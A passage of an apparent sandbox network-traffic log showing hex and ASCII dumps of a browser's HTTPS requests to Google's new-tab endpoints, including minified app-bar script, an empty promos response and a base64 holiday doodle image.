                                                                                                                                                                                                                                                            2024-12-21 21:19:53 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                            Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                            2024-12-21 21:19:53 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                            Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                            2024-12-21 21:19:53 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                            Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                            2024-12-21 21:19:53 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                            Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                            2024-12-21 21:19:53 UTC1390INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 31 35 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 31 36 30 31 37 35 30 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63
                                                                                                                                                                                                                                                            Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700315,3700949,3701384,101601750,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(func
                                                                                                                                                                                                                                                            2024-12-21 21:19:53 UTC1390INData Raw: 33 65 30 29 7b 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 47 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 46 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 48 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 49 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63
                                                                                                                                                                                                                                                            Data Ascii: 3e0){const c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Gd\u003dfunction(a){return new _.Fd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Hd\u003dglobalThis.trustedTypes;_.Id\u003dclass{c
                                                                                                                                                                                                                                                            2024-12-21 21:19:53 UTC1390INData Raw: 20 5f 2e 54 64 29 72 65 74 75 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 58 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 57 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 59 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 58 64 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20
                                                                                                                                                                                                                                                            Data Ascii: _.Td)return a.i;throw Error(\"F\");};_.Xd\u003dfunction(a){if(Wd.test(a))return a};_.Yd\u003dfunction(a){if(a instanceof _.Id)if(a instanceof _.Id)a\u003da.i;else throw Error(\"F\");else a\u003d_.Xd(a);return a};_.Zd\u003dfunction(a,b\u003ddocument){let
                                                                                                                                                                                                                                                            2024-12-21 21:19:53 UTC868INData Raw: 6e 74 2c 61 3f 61 5c 75 30 30 33 64 28 62 7c 7c 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 6b 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 79 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33
                                                                                                                                                                                                                                                            Data Ascii: nt,a?a\u003d(b||c).querySelector(a?\".\"+a:\"\"):(b\u003db||c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null));return a||null};\n_.ke\u003dfunction(a,b){_.yb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003
                                                                                                                                                                                                                                                            2024-12-21 21:19:53 UTC385INData Raw: 31 37 61 0d 0a 74 79 70 65 6f 66 20 63 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 3f 64 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 63 29 3f 64 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 2e 6a 6f 69 6e 28 5c 22 20 5c 22 29 3a 5f 2e 6b 65 28 64 2c 63 29 29 3b 62 2e 6c 65 6e 67 74 68 5c 75 30 30 33 65 32 5c 75 30 30 32 36 5c 75 30 30 32 36 6e 65 28 61 2c 64 2c 62 29 3b 72 65 74 75 72 6e 20 64 7d 3b 6e 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 65 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 79 70 65 6f 66 20 65 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30
                                                                                                                                                                                                                                                            Data Ascii: 17atypeof c\u003d\u003d\u003d\"string\"?d.className\u003dc:Array.isArray(c)?d.className\u003dc.join(\" \"):_.ke(d,c));b.length\u003e2\u0026\u0026ne(a,d,b);return d};ne\u003dfunction(a,b,c){function d(e){e\u0026\u0026b.appendChild(typeof e\u003d\u003d\u0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            83192.168.2.450110142.250.181.132443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:19:52 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                            2024-12-21 21:19:53 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Version: 705503573
                                                                                                                                                                                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:19:53 GMT
                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            2024-12-21 21:19:53 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                            2024-12-21 21:19:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            84192.168.2.450108142.250.181.132443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:19:54 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                            2024-12-21 21:19:55 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Version: 705503573
                                                                                                                                                                                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:19:55 GMT
                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            2024-12-21 21:19:55 UTC372INData Raw: 39 33 33 0d 0a 29 5d 7d 27 0a 7b 22 64 64 6c 6a 73 6f 6e 22 3a 7b 22 61 63 63 65 73 73 69 62 69 6c 69 74 79 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 22 2c 22 61 6c 74 5f 74 65 78 74 22 3a 22 53 65 61 73 6f 6e 61 6c 20 48 6f 6c 69 64 61 79 73 20 32 30 32 34 22 2c 22 64 61 72 6b 5f 64 61 74 61 5f 75 72 69 22 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 6c 67 41 41 41 44 36 43 41 4d 41 41 41 42 4b 38 38 6b 69 41 41 41 44 41 46 42 4d 56 45 56 48 63 45 79 51 2b 66 2f 2b 73 5a 4c 70 73 4f 44 36 35 4a 50 39 65 77 37 6c 6e 75 6e 39 34 33 62 33 50 6a 72 79 54 45 44 2b 6b 72 54 36 38 33 6e 2f 4f 44 62 39 6c 72 37 2f 4e 6a 50 39 62 49 44 65 6a 76 7a 2f 6d 4c 7a
                                                                                                                                                                                                                                                            Data Ascii: 933)]}'{"ddljson":{"accessibility_description":"","alt_text":"Seasonal Holidays 2024","dark_data_uri":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAlgAAAD6CAMAAABK88kiAAADAFBMVEVHcEyQ+f/+sZLpsOD65JP9ew7lnun943b3PjryTED+krT683n/ODb9lr7/NjP9bIDejvz/mLz
                                                                                                                                                                                                                                                            2024-12-21 21:19:55 UTC1390INData Raw: 5a 5a 6e 6d 59 36 79 32 57 4a 4c 79 59 71 76 2b 57 45 6a 2b 63 61 2f 37 58 71 44 36 4d 69 30 46 37 4f 58 34 4d 69 79 71 53 30 79 63 56 6d 45 4d 38 4f 59 41 37 66 38 41 38 65 55 45 34 66 76 2b 51 45 49 42 37 76 38 41 36 66 76 37 4c 69 66 38 4d 43 6f 44 39 64 2f 39 4e 44 41 4a 38 4e 61 63 53 6b 6b 49 36 75 6f 48 37 65 4b 54 54 30 7a 36 4c 79 66 2b 51 59 48 73 51 44 62 47 50 54 2b 77 51 55 48 64 4e 44 46 69 59 57 50 2b 4c 43 56 68 58 46 78 63 57 6c 70 67 57 6c 30 75 67 50 6f 4c 52 2b 70 62 57 31 70 62 57 6c 74 64 57 31 35 4f 56 6e 35 66 59 46 31 63 58 56 7a 37 4c 43 56 63 58 46 78 46 52 35 6f 4e 51 75 4d 4c 50 65 31 50 58 56 77 77 51 62 51 51 50 76 73 75 65 2f 51 4b 4f 76 44 39 4c 69 63 79 68 76 67 75 67 2f 67 41 62 4f 59 31 68 50 67 45 37 64 55 41 32 2b 6f
                                                                                                                                                                                                                                                            Data Ascii: ZZnmY6y2WJLyYqv+WEj+ca/7XqD6Mi0F7OX4MiyqS0ycVmEM8OYA7f8A8eUE4fv+QEIB7v8A6fv7Lif8MCoD9d/9NDAJ8NacSkkI6uoH7eKTT0z6Lyf+QYHsQDbGPT+wQUHdNDFiYWP+LCVhXFxcWlpgWl0ugPoLR+pbW1pbWltdW15OVn5fYF1cXVz7LCVcXFxFR5oNQuMLPe1PXVwwQbQQPvsue/QKOvD9Licyhvgug/gAbOY1hPgE7dUA2+o
                                                                                                                                                                                                                                                            2024-12-21 21:19:55 UTC600INData Raw: 59 55 39 4d 6f 6f 30 31 75 6a 31 45 31 66 4f 53 32 57 39 52 6d 4f 6c 55 5a 5a 35 51 52 4d 54 65 48 68 6c 4c 46 4b 6e 72 33 42 49 37 63 6c 47 4e 5a 6e 53 47 76 64 36 4c 4a 57 45 74 57 41 70 6f 77 31 59 45 31 67 38 61 63 4d 32 6c 4a 4d 36 2b 73 59 56 71 76 4c 57 6f 47 7a 73 53 69 48 70 38 64 62 62 67 75 2f 39 59 4c 48 34 61 64 49 69 33 7a 4e 50 75 53 73 48 49 70 79 33 75 2b 38 4e 78 34 6b 4c 36 47 73 62 4a 62 34 63 4c 4f 49 4d 46 61 4e 7a 6c 6b 4e 4d 53 75 48 50 38 6d 71 4b 48 48 42 37 57 59 31 4e 55 52 74 47 71 77 42 55 4a 55 7a 78 71 47 68 47 69 6e 4c 68 6b 73 74 78 62 49 2b 78 35 4d 77 37 35 56 79 4b 6f 2f 56 33 67 63 48 66 77 6a 77 49 5a 50 7a 30 4a 69 79 57 62 57 77 69 4c 53 49 65 36 57 47 6b 46 56 4a 71 69 68 78 68 66 50 51 47 70 56 75 77 2f 4d 66 61
                                                                                                                                                                                                                                                            Data Ascii: YU9Moo01uj1E1fOS2W9RmOlUZZ5QRMTeHhlLFKnr3BI7clGNZnSGvd6LJWEtWApow1YE1g8acM2lJM6+sYVqvLWoGzsSiHp8dbbgu/9YLH4adIi3zNPuSsHIpy3u+8Nx4kL6GsbJb4cLOIMFaNzlkNMSuHP8mqKHHB7WY1NURtGqwBUJUzxqGhGinLhkstxbI+x5Mw75VyKo/V3gcHfwjwIZPz0JiyWbWwiLSIe6WGkFVJqihxhfPQGpVuw/Mfa
                                                                                                                                                                                                                                                            2024-12-21 21:19:55 UTC168INData Raw: 61 32 0d 0a 5a 41 55 72 6a 47 76 59 71 65 6c 52 49 4b 79 59 57 4e 6d 73 65 4a 2f 55 62 75 2b 2f 4e 30 51 69 58 37 6c 44 50 41 69 50 59 62 44 57 47 4e 5a 4c 43 65 74 4a 77 6b 71 6e 6f 70 53 56 4a 38 75 41 32 6f 54 31 79 73 35 39 4c 71 6d 74 42 46 45 41 76 6b 45 58 69 32 74 71 63 35 59 51 73 7a 6b 48 63 6b 36 62 6e 66 50 37 76 34 70 50 71 36 63 52 38 6c 42 67 2f 47 75 6c 6d 6f 50 59 38 50 2b 72 4d 36 30 6d 70 4a 43 57 2f 58 77 70 66 76 38 78 4c 4f 34 72 75 4b 4c 35 71 73 43 73 67 6c 58 50 57 36 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: a2ZAUrjGvYqelRIKyYWNmseJ/Ubu+/N0QiX7lDPAiPYbDWGNZLCetJwkqnopSVJ8uA2oT1ys59LqmtBFEAvkEXi2tqc5YQszkHck6bnfP7v4pPq6cR8lBg/GulmoPY8P+rM60mpJCW/Xwpfv8xLO4ruKL5qsCsglXPW6
                                                                                                                                                                                                                                                            2024-12-21 21:19:55 UTC1390INData Raw: 35 34 39 64 0d 0a 4f 69 38 6e 79 4d 57 6d 74 72 65 63 38 7a 4b 34 76 65 36 52 44 42 53 6f 30 72 69 32 70 43 35 6e 52 46 73 46 79 53 46 51 37 75 37 41 6f 4a 56 67 4d 35 41 58 30 66 73 6a 59 32 66 47 39 4c 61 49 6b 73 42 4f 76 33 31 43 2f 66 4c 53 72 4a 66 4b 37 34 48 45 51 77 59 4f 32 77 71 77 44 78 45 4c 57 52 7a 2f 73 63 6a 78 36 37 33 69 2b 77 2b 43 69 30 73 6c 4c 35 4a 55 4e 37 66 30 62 72 76 35 67 72 6c 31 77 74 6b 4b 73 43 31 56 58 6f 53 6e 6e 4b 6c 37 41 74 73 37 4b 69 49 63 74 2b 66 6a 58 35 45 56 46 37 65 2f 53 55 7a 45 75 4c 58 54 45 73 64 6f 56 7a 6b 41 70 72 6e 2f 71 4b 57 53 6e 2f 49 49 4b 31 42 56 6a 65 72 73 44 69 64 32 66 52 4a 33 63 41 79 36 35 49 30 78 42 52 46 51 38 6a 69 2f 70 72 6e 6f 4f 51 4a 2f 65 64 48 62 67 36 5a 46 64 48 6e 6b 4b
                                                                                                                                                                                                                                                            Data Ascii: 549dOi8nyMWmtrec8zK4ve6RDBSo0ri2pC5nRFsFySFQ7u7AoJVgM5AX0fsjY2fG9LaIksBOv31C/fLSrJfK74HEQwYO2wqwDxELWRz/scjx673i+w+Ci0slL5JUN7f0brv5grl1wtkKsC1VXoSnnKl7Ats7KiIct+fjX5EVF7e/SUzEuLXTEsdoVzkAprn/qKWSn/IIK1BVjersDid2fRJ3cAy65I0xBRFQ8ji/prnoOQJ/edHbg6ZFdHnkK
